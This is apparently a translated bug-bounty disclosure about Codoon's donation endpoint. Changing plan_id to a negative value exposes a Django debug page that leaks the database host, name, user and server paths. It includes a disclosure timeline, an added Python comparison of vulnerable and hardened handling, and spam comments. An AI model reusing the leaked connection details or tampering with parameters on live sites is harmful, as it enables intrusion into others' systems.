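2013-08-03: Details reported to the vendor; awaiting vendor response
2013-08-03: Vendor confirmed; details disclosed to the vendor only
2013-08-13: Details disclosed to core white hats and experts in related fields
2013-08-23: Details disclosed to regular white hats
2013-09-02: Details disclosed to trainee white hats
2013-09-17: Details disclosed to the public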
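Leaks the database and a small portion of the source code
The vulnerability is in the calcoin donation feature: when clicking donate, change plan_id to a negative value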
DATABASES {'default': {'ENGINE': 'django.db.backends.mysql', 'HOST': 'rdsfviy3ifviy3i1367979506919.mysql.rds.aliyuncs.com', 'NAME': 'app_codoon', 'OPTIONS': {}, 'PASSWORD': '********************', 'PORT': '3306', 'TEST_CHARSET': None, 'TEST_COLLATION': None, 'TEST_MIRROR': None, 'TEST_NAME': None, 'TIME_ZONE': 'Asia/Shanghai', 'USER': 'aliyunmysql'}}
IntegrityError at /give_calcoin
(1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))')
Request Method: POST
Request URL: http://gongyi.codoon.com/give_calcoin
Django Version: 1.3.1
Exception Type: IntegrityError
Exception Value: (1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))')
Exception Location: /opt/python2.7.2/lib/python2.7/site-packages/MySQLdb/connections.py in defaulterrorhandler, line 36
Python Executable: /opt/python2.7.2/bin/python
Python Version: 2.7.2
Python Path: ['/var/www/ncodoon/gongyi', '/opt/python2.7.2/lib/python2.7/site-packages/distribute-0.6.24-py2.7.egg', '/opt/python2.7.2/lib/python2.7/site-packages/pip-1.3.1-py2.7.egg', '/var/www/ncodoon/src/gevent', '/opt/python2.7.2/lib/python27.zip', '/opt/python2.7.2/lib/python2.7', '/opt/python2.7.2/lib/python2.7/plat-linux2', '/opt/python2.7.2/lib/python2.7/lib-tk', '/opt/python2.7.2/lib/python2.7/lib-old', '/opt/python2.7.2/lib/python2.7/lib-dynload', '/opt/python2.7.2/lib/python2.7/site-packages', '/opt/python2.7.2/lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg-info', '/var/www/ncodoon/gongyi', '/var/www/ncodoon']
Server time: 星期五, 2 八月 2013 21:47:00 +0800
You're seeing this error because you have DEBUG = True in your Django settings file. Change that to False, and Django will display a standard 500 page.
You know what to do
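The two failures behind this report, shown as an added example that is not Codoon's code: request values reach the INSERT unchecked, and the error response reveals internals when debug output is on. It uses SQLite from the standard library in place of Django and MySQL; the table names come from the error page, while the column subset, the limits, the function names and the sample values are assumptions.

```python
import sqlite3

# Table names come from the error page; the columns are a constructed subset.
SCHEMA = """
CREATE TABLE commonweal_codoonplan (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE commonweal_calcoinorder (
    id INTEGER PRIMARY KEY,
    codoon_plan_id INTEGER NOT NULL REFERENCES commonweal_codoonplan (id),
    user_id TEXT NOT NULL,
    value INTEGER NOT NULL
);
INSERT INTO commonweal_codoonplan (id, title) VALUES (1, 'constructed sample plan');
"""
INSERT_ORDER = (
    "INSERT INTO commonweal_calcoinorder (codoon_plan_id, user_id, value) "
    "VALUES (?, ?, ?)"
)
GENERIC_500 = "Server error"   # what a client should see when debug output is off
MAX_ID = 2**31 - 1             # assumed upper bound for a plan id
MAX_CALCOIN = 10_000           # assumed per-donation limit (hypothetical)


def make_db():
    """In-memory database with foreign keys enforced, as MySQL/InnoDB does."""
    db = sqlite3.connect(":memory:")
    db.execute("PRAGMA foreign_keys = ON")  # SQLite enforces FKs only on request
    db.executescript(SCHEMA)
    return db


def order_count(db):
    return db.execute("SELECT COUNT(*) FROM commonweal_calcoinorder").fetchone()[0]


def give_calcoin_vulnerable(db, user_id, post, debug=True):
    """Mirrors the reported flow: POST values go straight into the INSERT."""
    try:
        with db:  # commits on success, rolls back on error
            db.execute(INSERT_ORDER, (post.get("plan_id"), user_id, post.get("calcoin")))
    except Exception as exc:
        # Stand-in for the framework's 500 handler: with debug on,
        # the exception text (and, in Django, settings and locals) reaches the client.
        return 500, f"{type(exc).__name__}: {exc}" if debug else GENERIC_500
    return 200, "ok"


def parse_positive_int(raw, upper):
    """Accept only plain ASCII decimal digits for a value in 1..upper."""
    if not isinstance(raw, str) or not raw.isascii() or not raw.isdigit():
        return None
    if len(raw) > 10:  # reject absurdly long digit strings before converting
        return None
    number = int(raw)
    return number if 1 <= number <= upper else None


def give_calcoin_hardened(db, user_id, post):
    """Validate first, confirm the plan exists, and never echo database errors."""
    plan_id = parse_positive_int(post.get("plan_id"), MAX_ID)
    calcoin = parse_positive_int(post.get("calcoin"), MAX_CALCOIN)
    if plan_id is None or calcoin is None:
        return 400, "invalid request"
    plan = db.execute(
        "SELECT 1 FROM commonweal_codoonplan WHERE id = ?", (plan_id,)
    ).fetchone()
    if plan is None:
        return 404, "unknown plan"
    try:
        with db:
            db.execute(INSERT_ORDER, (plan_id, user_id, calcoin))
    except sqlite3.IntegrityError:
        # The plan can disappear between the check and the insert;
        # record details server-side and return a fixed message.
        return 409, "could not create order"
    return 200, "ok"


if __name__ == "__main__":
    db = make_db()
    tampered = {"plan_id": "-1", "calcoin": "1"}  # the POST values from the report
    print(give_calcoin_vulnerable(db, "user-constructed", tampered))
    print(give_calcoin_vulnerable(db, "user-constructed", tampered, debug=False))
    print(give_calcoin_hardened(db, "user-constructed", tampered))
    print(give_calcoin_hardened(db, "user-constructed", {"plan_id": "1", "calcoin": "1"}))
```
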
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2013-08-03 10:57
Thanks, it has been fixed
None yet
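@咕咚网 When is your wristband going to be released?!!!
@z@cx - - Don't ask me
Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband Want a Codoon wristband
@mango Looks like this is turning into a spam flood···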
@我是小号 - -